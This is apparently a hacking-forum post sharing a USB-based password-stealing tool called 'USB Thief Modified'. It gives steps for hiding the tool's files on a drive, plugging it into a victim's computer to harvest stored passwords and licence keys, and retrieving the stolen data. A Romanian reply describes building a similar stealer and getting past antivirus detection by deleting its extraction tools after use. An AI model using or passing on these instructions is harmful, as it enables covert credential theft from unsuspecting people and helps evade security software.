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USB Thief Modified

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Came across this tool and thought id share.

USB Thief Modified



|* USBThief_Modified_by_NEO *|






USB Steals Pc Passwords

Tweaked USB that steals every passwords including licences.


1.Decompress the archive and put all the files located in the folder "COPY"into a USB.

2.now run the file "hideh.bat"(this makes the files totaly hiden which can not be seen even using show hide option).

3.now delete the fie "hideh.bat"


-----------NOW UR READY FOR WORK-----------


Wht Next??---Simple

just plug the USB drive into victims pc open up wait for 4 sec and done...


-----------HOW TO SEE THE DATA?------------


When u decompressed the archive it created folder named "USBThief_Modified_by_NEO"

go in it

there will b file "showh.bat"

just copy it to usb and double click on it

now refresh

and u will see the all folders in USB

open "IMNeoWorld"

done,,,there u r .. got it??


----------- FEATURE ------------


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RapidShare: 1-CLICK Web hosting - Easy Filehosting

Sursa: http://www.hackforums.net

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Am incercat si eu sa fac odata ceva de genu doar pentru browsere si m-am blocat la autorun. Am pierdut sursele si nu m-am mai apucat din nou. Foloseam niste tool-uri de extragere cu varianta command line si la un moment dat au devenit detectabile. Le-am pus intr-un fel de stealer pentru ca apucau sa se extraga si sa se ruleze, dupa care facea listele si stergea extractoarele nemaifiind probleme.Cel mai sigur e sa scrii tot codul, eu tot caut dupa modalitatea de apelare a functiilor dintr-un DLL folosind AutoIT.Restu e floare la ureche.Daca stie cineva PM please si dau ceva la schimb

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